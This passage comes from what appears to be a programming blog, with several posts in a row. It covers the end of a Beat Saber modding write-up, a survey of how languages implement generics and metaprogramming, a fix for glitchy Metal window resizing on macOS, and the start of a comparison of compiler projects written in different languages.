Emulamer hadn’t stopped working on Beat Saber patching though. After I retired he continued plugging away and eventually released BeatOn. BeatOn is an on-device patcher that uses a C hook injection system by jakibaki to redirect asset loading to mutable Android /sdcard/ storage. This means that you can load new songs on your Quest and it doesn’t have to re-sign and re-install the APK, so it’s faster. It also supports installing hook and asset mods for things like custom sabers and better swing score feedback. SideQuest also recently added support for installing BeatOn, accessing its UI from your computer, and copying your SideQuest song library to BeatOn. It’s basically completely replaced my patcher and is better in many ways. I’m glad for the progress and now use it myself.

Conclusion

My Beat Saber patching journey is now over but it was a fun one. I learned a bunch from figuring out how to mod a game in practice, as well as some C# programming. I also had fun collaborating with everyone on the BSMG Discord and figuring out how Beat Saber worked with them. Competing with emulamer was also a fun experience since I think we both benefitted from trying to implement cool things the other hadn’t and then letting each other take the ideas or code so that both of our patchers could improve. It was a very fun, friendly, casual competition. I think it was a good use of some of my summer: I had fun doing it, I’ve been playing Beat Saber nearly every day enjoying my custom songs and now can comfortably play at expert+ level, and many people have presumably also had fun with their custom levels through SideQuest and my patcher.

Models of Generics and Metaprogramming: Go, Rust, Swift, D and More

2019-07-14T00:00:00+00:00

In some domains of programming it’s common to want to write a data structure or algorithm that can work with elements of many different types, such as a generic list or a sorting algorithm that only needs a comparison function. Different programming languages have come up with all sorts of solutions to this problem: from just pointing people to existing general features that can be useful for the purpose (e.g. C, Go) to generics systems so powerful they become Turing-complete (e.g. Rust, C++). In this post I’m going to take you on a tour of the generics systems in many different languages and how they are implemented. I’ll start from how languages without a special generics system like C solve the problem and then I’ll show how gradually adding extensions in different directions leads to the systems found in other languages.

One reason I think generics are an interesting case is that they’re a simple case of the general problem of metaprogramming: writing programs that can generate classes of other programs. As evidence I’ll describe how three different fully general metaprogramming methods can be seen as extensions from different directions in the space of generics systems: dynamic languages like Python, procedural macro systems like Template Haskell, and staged compilation like Zig and Terra.

Overview

I made a flow chart of all the systems I discuss to give you an overview of what this post will contain and how everything fits together:

The basic ideas

Let’s say we’re programming in a language without a generics system and we want to make a generic stack data structure which works for any data type. The problem is that each function and type definition we write only works for data that’s the same size, is copied the same way, and generally acts the same way.

Two ideas for how to get around this are to find a way to make all data types act the same way in our data structure, or to make multiple copies of our data structure with slight tweaks to deal with each data type the correct way. These two ideas form the basis of the two major classes of solutions to generics: “boxing” and “monomorphization”.

Boxing is where we put everything in uniform “boxes” so that they all act the same way. This is usually done by allocating things on the heap and just putting pointers in the data structure. We can make pointers to all different types act the same way so that the same code can deal with all data types! However this can come at the cost of extra memory allocation, dynamic lookups and cache misses. In C this corresponds to making your data structure store void* pointers and just casting your data to and from void* (allocating on the heap if the data isn’t already on the heap).

Monomorphization is where we copy the code multiple times for the different types of data we want to store. This way each instance of the code can directly use the size and methods of the data it is working with, without any dynamic lookups. This produces the fastest possible code, but comes at the cost of bloat in code size and compile times as the same code with minor tweaks is compiled many times. In C this corresponds to defining your entire data structure in a macro and calling it for each type you want to use it with.

Overall the tradeoff is basically that boxing leads to better compile times but can hurt runtime performance, whereas monomorphization will generate the fastest code but takes extra time to compile and optimize all the different generated instances. They also differ in how they can be extended: Extensions to boxing allow more dynamic behavior at runtime, while monomorphization is more flexible with how different instances of generic code can differ. It’s also worth noting that in some larger programs the performance advantage of monomorphization might be canceled out by the additional instruction cache misses from all the extra generated code.

Each of these schools of generics has many directions it can be extended in to add additional power or safety, and different languages have taken them in very interesting directions. Some languages like Rust and C# even provide both options!

Boxing

Let’s start with an example of the basic boxing approach in Go:

type Stack struct {
  values []interface{}
}

func (this *Stack) Push(value interface{}) {
  this.values = append(this.values, value)
}

func (this *Stack) Pop() interface{} {
  x := this.values[len(this.values)-1]
  this.values = this.values[:len(this.values)-1]
  return x
}

Example languages that use basic boxing: C (void*), Go (interface{}), pre-generics Java (Object), pre-generics Objective-C (id)

Type-erased boxed generics

Here are some problems with the basic boxing approach:

Depending on the language we often need to cast values to and from the correct type every time we read or write to the data structure.
Nothing stops us from putting elements of different types into the structure, which could allow bugs that manifest as runtime crashes.

A solution to both of these problems is to add generics functionality to the type system, while still using the basic boxing method exactly as before at runtime. This approach is often called type erasure, because the types in the generics system are “erased” and all become the same type (like Object) under the hood.

Java and Objective-C both started out with basic boxing, and later added language features for generics with type erasure, even using the exact same collection types as before for compatibility, but with optional generic type parameters. See the following example from the Wikipedia article on Java Generics:

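// Without generics: the bad cast compiles and only fails at run time
List v = new ArrayList();
v.add("test"); // A String that cannot be cast to an Integer
Integer i = (Integer)v.get(0); // Run time error

// With generics: the same mistake is rejected by the compiler
List<String> v = new ArrayList<String>();
v.add("test");
Integer i = v.get(0); // (type error) compilation-time error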

Inferred boxed generics with a uniform representation

OCaml takes this idea even further with a uniform representation where there are no primitive types that require an additional boxing allocation (like int needing to be turned into an Integer to go in an ArrayList in Java), because everything is either already boxed or represented by a pointer-sized integer, so everything is one machine word. However when the garbage collector looks at data stored in generic structures it needs to tell pointers from integers, so integers are tagged using a 1 bit in a place where valid aligned pointers never have a 1 bit, leaving only 31 or 63 bits of range.
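The tagging arithmetic is simple enough to sketch directly. This Python version simulates a 64-bit word and uses the low bit as the integer tag, which is the bit aligned pointers always leave as 0. The function names are made up for illustration:

```python
WORD_BITS = 64
WORD_MASK = (1 << WORD_BITS) - 1

def tag_int(n: int) -> int:
    """Encode n as a tagged machine word: shift left by one, set the low bit."""
    assert -(1 << (WORD_BITS - 2)) <= n < (1 << (WORD_BITS - 2)), "only 63 bits fit"
    return ((n << 1) | 1) & WORD_MASK

def is_int(word: int) -> bool:
    """Aligned pointers have a 0 low bit, so a 1 low bit marks an integer."""
    return (word & 1) == 1

def untag_int(word: int) -> int:
    """Recover the integer with a sign-preserving right shift."""
    if word >= 1 << (WORD_BITS - 1):   # reinterpret the word as a signed value
        word -= 1 << WORD_BITS
    return word >> 1

print(tag_int(5), untag_int(tag_int(-7)))  # 11 -7
```

Losing one bit to the shift is exactly why the usable range is 63 bits on a 64-bit machine.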

OCaml also has a type inference system so you can write a function and the compiler will infer the most generic type possible if you don’t annotate it, which can lead to functions that look like a dynamically typed language:

let first (head :: tail) = head
(* inferred type: 'a list -> 'a *)

The inferred type is read as “a function from a list of elements of type 'a to something of type 'a”. This encodes the relation that the return type is the same as the list’s element type, but that it can be any type.

Interfaces

A different limitation in the basic boxing approach is that the boxed types are completely opaque. This is fine for data structures like a stack, but things like a generic sorting function need some extra functionality, like a type-specific comparison function. There are a number of different ways of both implementing this at runtime and exposing this in the language, which are technically different axes, and you can implement the same language using multiple of these approaches. However, it seems like different language features mostly lend themselves towards being implemented a certain way, and then language extensions take advantage of the strengths of the chosen implementation. This means there are mostly two families of languages based around the different runtime approaches: vtables and dictionary passing.

Interface vtables

If we want to expose type-specific functions while sticking with the boxing strategy of a uniform way of working with everything, we can just make sure that there’s a uniform way to find the type-specific function we want from an object. This approach is called using “vtables” (shortened from “virtual method tables” but nobody uses the full name). It is implemented by storing, at offset zero in every object in the generic structure, a pointer to some tables of function pointers with a consistent layout. These tables allow the generic code to look up a pointer to the type-specific functions in the same way for every type by indexing certain pointers at fixed offsets.

This is how interface types are implemented in Go and dyn trait objects are implemented in Rust. When you cast a type to an interface type for something it implements, it creates a wrapper that contains a pointer to the original object and a pointer to a vtable of the type-specific functions for that interface. However, this requires an extra layer of pointer indirection and a different layout. This is why sorting in Go uses an interface for the container with a Swap method instead of taking a slice of a Comparable interface: the latter would require allocating an entire new slice of the interface types, and then it would only sort that and not the original slice!
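The container-level interface can be sketched in Python to show why it avoids wrapping each element. The three operations mirror the shape of Go's sort.Interface (Len, Less, Swap); the class and function names are made up for this example, and insertion sort is only there to keep it short.

```python
class ByLength:
    """Adapter exposing a list through three container-level operations."""
    def __init__(self, items):
        self.items = items
    def length(self):
        return len(self.items)
    def less(self, i, j):
        return len(self.items[i]) < len(self.items[j])
    def swap(self, i, j):
        self.items[i], self.items[j] = self.items[j], self.items[i]

def insertion_sort(data):
    """Sort using only length/less/swap, never touching an element directly."""
    for i in range(1, data.length()):
        j = i
        while j > 0 and data.less(j, j - 1):
            data.swap(j, j - 1)
            j -= 1

words = ["pear", "fig", "banana", "kiwi"]
insertion_sort(ByLength(words))
print(words)  # ['fig', 'pear', 'kiwi', 'banana']
```

Only one wrapper is created for the whole container, and the swaps happen in the original list, so nothing has to be copied into a new slice of interface values.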

Object-oriented programming

Object-oriented programming is a language feature that makes good use of the power of vtables. Instead of having separate interface objects that contain the vtables, object-oriented languages like Java just have a vtable pointer at the start of every object. Java-like languages have a system of inheritance and interfaces that can be implemented entirely with these object vtables.

As well as providing additional features, embedding vtables in every object also solves the earlier problem of needing to construct new interface types with indirection. Unlike Go, in Java the sorting function can just use the Comparable interface on types that implement it.

Reflection

Once you have vtables, it’s not too difficult to have the compiler also generate tables of other type information like field names, types and locations. This allows accessing all the data in a type with the same code that can inspect all the data in any other type. This can be used to add a “reflection” feature to your language which can be used to implement things like serialization and pretty printing for arbitrary types. As an extension of the boxing paradigm it has the same tradeoff that it only requires one copy of the code but requires a lot of slow dynamic lookups, which can lead to slow serialization performance.

Examples of languages with reflection features they use for serialization and other things include Java, C# and Go.
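As a small illustration of reflection-driven serialization, here is a Python sketch that uses the field tables the dataclasses module keeps for each class. The Point and Path types are made up for the example. One function handles every dataclass, at the cost of looking up each field by name at runtime:

```python
from dataclasses import dataclass, fields, is_dataclass

def to_plain(value):
    """Convert any dataclass instance to dicts/lists by walking its field table."""
    if is_dataclass(value):
        return {f.name: to_plain(getattr(value, f.name)) for f in fields(value)}
    if isinstance(value, list):
        return [to_plain(item) for item in value]
    return value  # assumed to already be a plain int, float, str or bool

@dataclass
class Point:
    x: int
    y: int

@dataclass
class Path:
    name: str
    points: list

print(to_plain(Path("diagonal", [Point(0, 0), Point(1, 1)])))
```

Note that `to_plain` was written before `Point` and `Path` existed and never mentions them, which is the "one copy of the code" property of the boxing family.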

Dynamically typed languages

Reflection is very powerful and can do a lot of different metaprogramming tasks, but one thing it can’t do is create new types or edit the type information of existing values. If we add the ability to do this, as well as make the default access and modification syntaxes go through reflection, we end up with dynamically typed languages! The incredible flexibility to do metaprogramming in languages like Python and Ruby comes from effectively super-powered reflection systems that are used for everything.
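Those two extra abilities are easy to demonstrate in Python itself. A minimal sketch with made-up type names, showing a type created at runtime, a type edited after values of it exist, and an existing value switched to a different type:

```python
# Create a brand-new type at runtime from a name, base classes and an attribute table.
Duck = type("Duck", (), {"speak": lambda self: "quack"})
pet = Duck()
first_sound = pet.speak()

# Edit the type information of an existing type; existing values see the change.
Duck.swim = lambda self: "paddle"
swim_result = pet.swim()

# Point an existing value at a different type entirely.
Robot = type("Robot", (), {"speak": lambda self: "beep"})
pet.__class__ = Robot
second_sound = pet.speak()

print(first_sound, swim_result, second_sound)  # quack paddle beep
```

Every method call here goes through a runtime lookup in the type's attribute table, which is the "default syntax goes through reflection" part.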

“But Tristan, that’s not how dynamic languages work, they just implement everything with hash tables!” you may say. Well, hash tables are just a good data structure for implementing editable type information tables! Also, that’s just how some interpreters like CPython do things. If you look at how a high performance JIT like V8 implements things, it looks a lot like vtables and reflection info! V8’s hidden classes (vtables and reflection info) and object layout are similar to what you might see in a Java VM, just with the capability for objects to change to a new vtable at runtime. This is not a coincidence because nothing is ever a coincidence: The person listed on Wikipedia as the creator of V8 previously worked on a high-performance Java VM.

Dictionary Passing

Another way of implementing dynamic interfaces, instead of associating vtables with objects, is to pass a table of the required function pointers along to generic functions that need them. This approach is in a way similar to constructing Go-style interface objects at the call site, just that the table is passed as a hidden argument instead of packaged into a bundle as one of the existing arguments.

This approach is used by Haskell type classes although GHC has the ability to do a kind of monomorphization as an optimization through inlining and specialization. Dictionary passing is also used by OCaml with an explicit argument in the form of first class modules, but there’s a proposal to add a mechanism to make the parameter implicit.
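Here is roughly what dictionary passing looks like if you write the hidden argument out by hand, sketched in Python. The Ord record and the function names are made up for this example, and a compiler would normally insert the extra argument for you:

```python
from typing import Any, Callable, NamedTuple

class Ord(NamedTuple):
    """A 'dictionary' of the operations an ordered type must provide."""
    less: Callable[[Any, Any], bool]

def maximum(ord_dict: Ord, items):
    """Generic code: knows nothing about the elements except via ord_dict."""
    best = items[0]
    for item in items[1:]:
        if ord_dict.less(best, item):
            best = item
    return best

ORD_INT = Ord(less=lambda a, b: a < b)
ORD_BY_LENGTH = Ord(less=lambda a, b: len(a) < len(b))

print(maximum(ORD_INT, [3, 9, 2]))                 # 9
print(maximum(ORD_BY_LENGTH, ["aa", "b", "cccc"]))  # cccc
```

The table travels next to the data instead of inside it, so the elements themselves need no vtable pointer or wrapper.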

Swift Witness Tables

Swift makes the interesting realization that by using dictionary passing and also putting the size of types and how to move, copy and free them into the tables, they can provide all the information required to work with any type in a uniform way without boxing them. This way Swift can implement generics without monomorphization and without allocating everything into a uniform representation! They still pay the cost of all the dynamic lookups that all boxing-family implementations pay, but they save on the allocation, memory and cache-incoherency costs. The Swift compiler also has the ability to specialize (monomorphize) and inline generics within a module and across modules with functions annotated @inlinable to avoid these costs if it wants to, presumably using heuristics about how much it would bloat the code.
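To give a feel for the idea, here is a loose Python sketch of a stack that stores its elements inline in one buffer, with the element size and the load/store routines supplied by a table. All the names are hypothetical and this is not how Swift's witness tables are actually laid out. Python values are of course boxed on the way in and out, so only the storage illustrates the technique.

```python
import struct
from typing import Any, Callable, NamedTuple

class Witness(NamedTuple):
    size: int                                      # bytes per value
    store: Callable[[bytearray, int, Any], None]   # write a value at an offset
    load: Callable[[bytearray, int], Any]          # read a value from an offset

def make_witness(fmt: str) -> Witness:
    packer = struct.Struct(fmt)
    return Witness(packer.size,
                   lambda buf, off, value: packer.pack_into(buf, off, value),
                   lambda buf, off: packer.unpack_from(buf, off)[0])

class InlineStack:
    """One copy of the code; the element layout comes from the witness table."""
    def __init__(self, witness: Witness):
        self.witness = witness
        self.buf = bytearray()
    def push(self, value):
        offset = len(self.buf)
        self.buf.extend(bytes(self.witness.size))  # grow by exactly one element
        self.witness.store(self.buf, offset, value)
    def pop(self):
        offset = len(self.buf) - self.witness.size
        value = self.witness.load(self.buf, offset)
        del self.buf[offset:]
        return value

INT32 = make_witness("<i")
FLOAT64 = make_witness("<d")
```

An `InlineStack(INT32)` uses 4 bytes per element and an `InlineStack(FLOAT64)` uses 8, yet both run the same `push` and `pop` code with no per-element allocation.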

This functionality also explains how Swift can implement ABI stability in a way that allows adding and rearranging fields in structs, although they provide a @frozen attribute to opt out of dynamic lookups for performance reasons.

Intensional Type Analysis

One more way to implement interfaces for your boxed types is to add a type ID in a fixed part of the object like where a vtable pointer would go, then generate functions for each interface method that effectively have a big switch statement over all the types that implement that interface method and dispatch to the correct type-specific method.

I’m not aware of any languages that use this technique, but C++ compilers and Java VMs do something similar to this when they use profile-guided optimization to learn that a certain generic call site mostly acts on objects of certain types. They’ll replace the call site with a check for each common type and then a static dispatch for that common type, with the usual dynamic dispatch as a fallback case. This way the branch predictor can predict the common case branch will be taken and continue dispatching instructions through the static call.
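A tiny Python sketch of the type ID approach, with objects modelled as a (type ID, fields) pair and hypothetical shape types. In a real implementation the `area` function would be generated by the compiler from the list of types implementing the interface:

```python
import math

CIRCLE, RECT = 0, 1    # hypothetical type IDs stored in a fixed slot

def circle_area(fields):
    (radius,) = fields
    return math.pi * radius * radius

def rect_area(fields):
    width, height = fields
    return width * height

def area(obj):
    """One function per interface method, switching on the type ID."""
    type_id, fields = obj
    if type_id == CIRCLE:
        return circle_area(fields)   # direct call, no table lookup
    if type_id == RECT:
        return rect_area(fields)
    raise TypeError(f"type id {type_id} does not implement area")

print(area((RECT, (2, 3))))  # 6
```

The profile-guided version has the same shape, except only the common types get a branch and the final case falls back to the usual dynamic dispatch instead of raising.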

Monomorphization

Now, the alternative approach to boxing is monomorphization. In the monomorphization approach we need to find some way to output multiple versions of our code for each type we want to use it with. Compilers have multiple phases of representations that the code passes through as it is compiled, and we theoretically can do the copying at any of these stages.

Generating source code

The simplest approach to monomorphization is to do the copying at the stage of the first representation: source code! This way the compiler doesn’t even have to have generics support in it, and this is what users of languages like C and Go, where the compiler doesn’t support generics, sometimes do.

In C you can use the preprocessor and define your data structure in a macro or a header that you include multiple times with different #defines. In Go there are scripts like genny that make this code generation process easy.

The downside of this is that duplicating source code can have a lot of warts and edge cases to look out for depending on the language, and also gives the compiler lots of extra work to do parsing and type checking basically the same code many times. Again depending on language and tools, generics built this way can be ugly to write and use. For example, if you write one inside a C macro, every line has to end with a backslash and all type and function names need to have the type name manually concatenated onto their identifiers to avoid collisions.
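A generator script for this can be very small. Here is a sketch in Python that stamps out C source for a stack of each element type, in the spirit of tools like genny. The template, the naming scheme and the list of types are all made up for illustration, and the generated C skips error handling:

```python
from string import Template

STACK_TEMPLATE = Template("""\
typedef struct { $type *items; size_t len, cap; } ${name}_stack;

void ${name}_stack_push(${name}_stack *s, $type value) {
    if (s->len == s->cap) {
        s->cap = s->cap ? s->cap * 2 : 8;
        s->items = realloc(s->items, s->cap * sizeof($type));
    }
    s->items[s->len++] = value;
}

$type ${name}_stack_pop(${name}_stack *s) {
    return s->items[--s->len];
}
""")

def generate_stack(c_type: str, name: str) -> str:
    """Return C source for a stack specialized to one element type."""
    return STACK_TEMPLATE.substitute(type=c_type, name=name)

# One full copy of the code per type, with the type name baked into every identifier.
source = "#include <stdlib.h>\n\n" + "\n".join(
    generate_stack(c_type, name)
    for c_type, name in [("int", "int"), ("double", "double"), ("char *", "str")]
)
print(source)
```

The name concatenation that is so painful inside a C macro becomes plain string substitution here, but the C compiler still has to parse and check three nearly identical copies.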

D string mixins

Code generation does have something going for it though, which is that you can generate the code using a fully powered programming language, and also it uses a representation that the user already knows.

Some languages that implement generics in some other way also include a clean way of doing code generation to address more general metaprogramming use cases not covered by their generics system, like serialization. The clearest example of this is D’s string mixins which enable generating D code as strings using the full power of D during the middle of a compile.

Rust procedural macros

A similar example but with a representation only one step into the compiler is Rust’s procedural macros, which take token streams as input and output token streams, while providing utilities to convert token streams to and from strings. The advantage of this approach is that token streams can preserve source code location information. A macro can directly paste code the user wrote from input to output as tokens. Then, if the user’s code causes a compiler error in the macro output, the error message the compiler prints will correctly point to the file, line and columns of the broken part of the user’s code, whereas if the macro itself generates broken code the error message will point to the macro invocation. For example if you use a macro that wraps a function in logging calls and make a mistake in the implementation of the wrapped function, the compiler error will point directly to the mistake in your file, rather than saying the error occurred in code generated by the macro.

Syntax tree macros

Some languages do take the step further and offer facilities for consuming and producing Abstract Syntax Tree (AST) types in macros written in the language. Examples of this include Template Haskell, Nim macros, OCaml PPX and nearly all Lisps.

One problem with AST macros is that you don’t want to require users to learn a bunch of functions for constructing AST types as well as the base language itself. The Lisp family of languages address this by making the syntax and the AST structure very simple with a very direct correspondence, but constructing the structures can still be tedious. Thus, all the languages I mention have some form of “quote” primitive where you provide a fragment of code in the language and it returns the syntax tree. These quote primitives also have a way to splice syntax tree values in like string interpolation. Here’s an example in Template Haskell:

-- using AST construction functions
genFn :: Name -> Q Exp
genFn f = do
  x <- newName "x"
  lamE [varP x] (appE (varE f) (varE x))

-- using quotation with $() for splicing
genFn' :: Name -> Q Exp
genFn' f = [| \x -> $(varE f) x |]
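The same quote-and-splice shape can be imitated with Python's ast module, which gives a rough feel for the technique even though Python has no real quote primitive. In this sketch, parsing a string stands in for the quote and renaming a placeholder node stands in for the splice. The PLACEHOLDER convention and the function name are made up here, and unlike newName nothing guards against name capture.

```python
import ast

def gen_fn(func_name: str) -> ast.Expression:
    """Build the syntax tree for `lambda x: <func_name>(x)` by quote-and-splice."""
    tree = ast.parse("lambda x: PLACEHOLDER(x)", mode="eval")   # "quote"
    for node in ast.walk(tree):
        if isinstance(node, ast.Name) and node.id == "PLACEHOLDER":
            node.id = func_name                                   # "splice"
    return tree

tree = gen_fn("abs")
wrapped = eval(compile(tree, "<generated>", "eval"))
print(wrapped(-3))  # 3
```

Compared with building every node by hand, the quoted fragment stays readable as ordinary code, which is the whole appeal of quotation.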

One disadvantage of doing procedural macros at the syntax tree level instead of token level is that syntax tree types often change with the addition of new language features, while token types can remain compatible. For example OCaml’s PPX system needs special infrastructure to migrate parse trees to and from the language version used by a macro. Rust, by contrast, has libraries that add parsing and quotation utilities so you can write procedural macros in a style similar to syntax tree macros. Rust even has an experimental library that tries to replicate the interface provided by reflection!

Templates

The next type of generics is just pushing the code generation a little further in the compiler. Templates as found in C++ and D are a way of implementing generics where you can specify “template parameters” on types and functions and when you instantiate a template with a specific type, that type is substituted into the function, and then the function is type checked to make sure that the combination is valid.

template <class T> T myMax(T a, T b) {
  return (a>b?a:b);
}

template <class T> struct Pair {
  T values[2];
};

int main() {
  myMax(5, 6);
  Pair<int> p { {5,6} };
  // This would give us a compile error inside myMax
  // about Pair being an invalid operand to `>`:
  // myMax(p, p);
}

One problem with the template system is that if you include a template function in your library and a user instantiates it with the wrong type they may get an inscrutable compile error inside your library. This is very similar to what can happen with libraries in dynamically typed languages when a user passes in the wrong type. D has an interesting solution to this which is similar to what popular libraries in dynamic languages do: just use helper functions to check the types are valid, the error messages will clearly point to the helpers if they fail! Here’s the same example in D, note the if in the signature and the generally better syntax (! is how you provide template parameters):

// We're going to use the isNumeric function in std.traits
import std.traits;

// The `if` is optional (without it you'll get an error inside like C++)
// The `if` is also included in docs and participates in overloading!
T myMax(T)(T a, T b) if(isNumeric!T) {
    return (a>b?a:b);
}

struct Pair(T) {
  T[2] values;
}

void main() {
  myMax(5, 6);
  Pair!int p = {[5,6]};
  // This would give a compile error saying that `(Pair!int, Pair!int)`
  // doesn't match the available instance `myMax(T a, T b) if(isNumeric!T)`:
  // myMax(p, p);
}

C++20 has a feature called “concepts” that serves the same purpose except with a design more like defining interfaces and type constraints.

Compile time functions

D’s templates have a number of extensions that allow you to use features like compile time function evaluation and static if to basically make templates act like functions that take a compile time set of parameters and return a non-generic runtime function. This makes D templates into a fully featured metaprogramming system, and as far as I understand modern C++ templates have similar power but with less clean mechanisms.

There’s some languages that take the “generics are just compile time functions” concept and run with it even further, like Zig:

fn Stack(comptime T: type) type {
    return struct {
        items: []T,
        len: usize,

        const Self = @This();
        pub fn push(self: *Self, item: T) void {
            // ...
        }
    };
}

Zig does this using the same language at both compile time and runtime, with functions split up based on parameters marked comptime. There’s another language that uses a separate but similar language at the meta level called Terra. Terra is a dialect of Lua that allows you to construct lower level C-like functions inline and then manipulate them at the meta level using Lua APIs as well as quoting and splicing primitives:

function MakeStack(T)
    local struct Stack {
        items : &T; -- &T is a pointer to T
        len : int;
    }
    terra Stack:push(item : T)
        -- ...
    end
    return Stack
end

Terra’s crazy level of metaprogramming power allows it to do things like implement optimizing compilers for domain specific languages as simple functions, or implement the interface and object systems of Java and Go in a library with a small amount of code. Then it can save out generated runtime-level code as dependency-free object files.

Rust generics

The next type of monomorphized generics of course moves the code generation one step further into the compiler, after type checking. I mentioned that the inside-the-library errors you can get with C++ are like the errors you can get in a dynamically typed language. This is of course because there’s basically only one type of type in template parameters, like a dynamic language. So that means we can fix the problem by adding a type system to our meta level and having multiple types of types with static checking that they support the operations you use. This is how generics work in Rust, and at the language level also how they work in Swift and Haskell.

In Rust you need to declare “trait bounds” on your type parameters, where traits are like interfaces in other languages and declare a set of functionality provided by the type. The Rust compiler will check that the body of your generic functions will work with any type conforming to your trait bounds, and also not allow you to use functionality of the type not declared by the trait bounds. This way users of generic functions in Rust can never get compile errors inside a library function when they instantiate it. The compiler also only has to type check each generic function once.

fn my_max<T: PartialOrd>(a: T, b: T) -> T {
    if a > b { a } else { b }
}

struct Pair<T> {
    values: [T; 2],
}

fn main() {
    my_max(5,6);
    let p: Pair<i32> = Pair { values: [5,6] };
    // Would give a compile error saying that
    // PartialOrd is not implemented for Pair<i32>:
    // my_max(p,p);
}

At the language level this is very similar to the kind of type system you need to implement generics with interface support using the boxing approach to generics, which is why Rust can support both using the same system! Rust 2018 even added a uniform syntax where a v: &impl SomeTrait parameter gets monomorphized but a v: &dyn SomeTrait parameter uses boxing. This property also allows compilers like Swift’s and Haskell’s GHC to monomorphize as an optimization even though they default to boxing.
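As a rough sketch of the two parameter forms side by side, here is a made-up `Shape` trait (the trait, the types and the function names are all assumptions for illustration, not from any real library):

```rust
// Hypothetical trait and types, used only for illustration.
trait Shape {
    fn area(&self) -> f64;
}

struct Square(f64);
struct Rect(f64, f64);

impl Shape for Square {
    fn area(&self) -> f64 {
        self.0 * self.0
    }
}

impl Shape for Rect {
    fn area(&self) -> f64 {
        self.0 * self.1
    }
}

// Monomorphized: the compiler generates one copy of this function per
// concrete type it is called with.
fn area_static(s: &impl Shape) -> f64 {
    s.area()
}

// Dynamic dispatch: a single copy that calls through the vtable carried by
// the trait object.
fn area_dyn(s: &dyn Shape) -> f64 {
    s.area()
}

// Trait objects also let one collection hold different concrete types.
fn total_area(shapes: &[Box<dyn Shape>]) -> f64 {
    shapes.iter().map(|s| s.area()).sum()
}
```

Both functions are checked against the same trait, so switching a parameter between the two forms is usually a one-word change at the declaration.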

Machine code monomorphization

The logical next step in monomorphized generics models is pushing it further in the compiler, after the backend. Just like we can copy source code templates that are annotated with placeholders for the generic type, we can generate machine code with placeholders for the type-specific parts. Then we can stamp these templates out very quickly with a memcpy and a few patches like how a linker works! The downside is that each monomorphized copy couldn’t be specially optimized by the optimizer, but because of the lack of duplicate optimization, compilation can be way faster. We could even make the code stamper a tiny JIT that gets included in binaries and stamps out the monomorphized copies at runtime to avoid bloating the binaries.
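To make the stamping idea a bit more concrete, here is a toy sketch. `Template`, `stamp` and the byte layout are all invented for illustration: the "code" is just opaque bytes with recorded offsets where a type-specific 4-byte value (say, the element size) gets patched in. A real design would need many more kinds of patches, such as call targets and field offsets.

```rust
// A "machine code" template: opaque bytes plus the offsets where a
// type-specific 4-byte little-endian value must be patched in.
// Everything here is hypothetical and only illustrates the idea.
struct Template {
    code: Vec<u8>,
    size_patches: Vec<usize>,
}

// Stamp out one monomorphized copy: a bulk copy followed by a few patches,
// with no optimizer involved.
fn stamp(template: &Template, elem_size: u32) -> Vec<u8> {
    let mut out = template.code.clone(); // the "memcpy"
    for &offset in &template.size_patches {
        out[offset..offset + 4].copy_from_slice(&elem_size.to_le_bytes());
    }
    out
}
```

Stamping is linear in the size of the template plus the number of patches, which is where the hoped-for compile time win would come from.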

Actually I’m not aware of any language that works this way, it’s just an idea that came to me while writing as a natural extension of this taxonomy, which is exactly the kind of thing I hoped for from this exercise! I hope this post gives you a clearer picture of the generics systems in different languages and how they can be fit together into a coherent taxonomy, and prompts you to think about the directions in concept-space where we might find new cool programming languages.

Glitchless Metal Window Resizing

2019-06-19T00:00:00+00:00

There’s a problem with Apple’s Metal MTKView on macOS which is that seemingly nobody can figure out how to get smooth window resizing to work properly. I just figured it out, more on that later. If you reposition the triangle in Apple’s Hello Triangle program to the left (to make the rescaling more apparent) then you can see it judders horribly when the window is resized:

What’s happening is often the new Metal frame doesn’t arrive in time and it draws a stretched version of the previous frame instead. There’s a number of places on the internet dating back to 2017 with various people encountering the problem:

Basically everyone who tries to make something with Metal that’s not a game runs into this problem and it looks horrible. As far as I can tell nobody has figured out how to fix it properly before and posted about it afterwards. Note in the first dev forums thread that an Apple employee claimed they were looking into this problem almost a year ago with no resolution.

I started a test project to try out different ways of drawing with Metal during resize to see if I could get any of them to work properly. First I replicated the MTKView problems and tried to fix them by tweaking lots of different things, including all three modes of triggering draws listed in the docs and using presentsWithTransaction in the way the docs suggest but nothing helped. Then I made a version using Core Graphics and an NSView subclass and stacked it below my Metal view so that I could have a reference that worked properly.

The Solution

Then I tried the accepted answer by Max on the Stack Overflow post which uses CAMetalLayer and some resizing-related properties. This reduced the frequency of glitches quite a bit, but didn’t eliminate them. So I added in presentsWithTransaction = true, which wasn’t enough on its own, but combining that with commandBuffer.waitUntilScheduled() then presenting as suggested in the Apple CAMetalLayer docs fixed all the glitches! I also needed to do some size conversion to make the accepted answer’s recipe draw crisply on high DPI displays.

Edit: @CoreyDotCom on Twitter reminded me I forgot to mention something. If you follow the recipe from the Stack Overflow post, it will appear to be glitch-free, but it actually isn’t. The layerContentsPlacement = .topLeft makes the glitches manifest as small broken slices near the moving window edge, which are very difficult to notice since the edge is moving quickly. When you change the placement policy to layerContentsPlacement = .scaleAxesIndependently to match the behavior of MTKView you see that there are still occasional glitches. Corey reports frame rate issues with presentsWithTransaction, and if this is the case for you as well it may be preferable to just mask the occasional remaining glitches with the top left placement policy.

Working Code

I now have a Metal triangle test program that resizes smoothly and without judder.

Check out my test project: Github repo

And the specific code file containing the working recipe: MetalLayerView

In the gif below the top is the broken MTKView, the middle NSView, and the bottom the working CAMetalLayer recipe. Contrast the shaky left edge of the top triangle with the stable bottom one:

Comparing the Same Project in Rust, Haskell, C++, Python, Scala and OCaml

2019-04-29T00:00:00+00:00

During my final term at UWaterloo I took the CS444 compilers class with a project to write a compiler from a substantial subset of Java to x86, in teams of up to three people with a language of the group’s choice. This was a rare opportunity to compare implementations of large programs that all did the same thing, written by friends I knew were highly competent, and have a fairly pure opportunity to see what difference design and language choices could make. I gained a lot of useful insights from this. It’s rare to encounter such a controlled comparison of languages, it’s not perfect but it’s much better than most anecdotes people use as the basis for their opinions on programming languages.

We did our compiler in Rust and my first comparison was with a team that used Haskell, which I expected to be much terser, but their compiler used similar amounts or more code for the same task. The same was true for a team that used OCaml. I then compared with a team that used C++, and as expected their compiler was around 40% larger largely due to headers and lack of sum types and pattern matching. The next comparison was my friend who did a compiler on her own in Python and used less than half the code we did because of the power of metaprogramming and dynamic types. A friend whose team used Scala also had a smaller compiler than us. The comparison that surprised me most though was with another team that also used Rust, but used 3 times the code that we did, because of different design decisions. In the end, the largest difference in the amount of code required was within the same language!

I’ll go over why I think this is a good comparison, some information on each project, and I’ll explain some of the sources of the differences in compiler size. I’ll also talk about what I learned from each comparison. Feel free to use these links to skip ahead to what interests you:

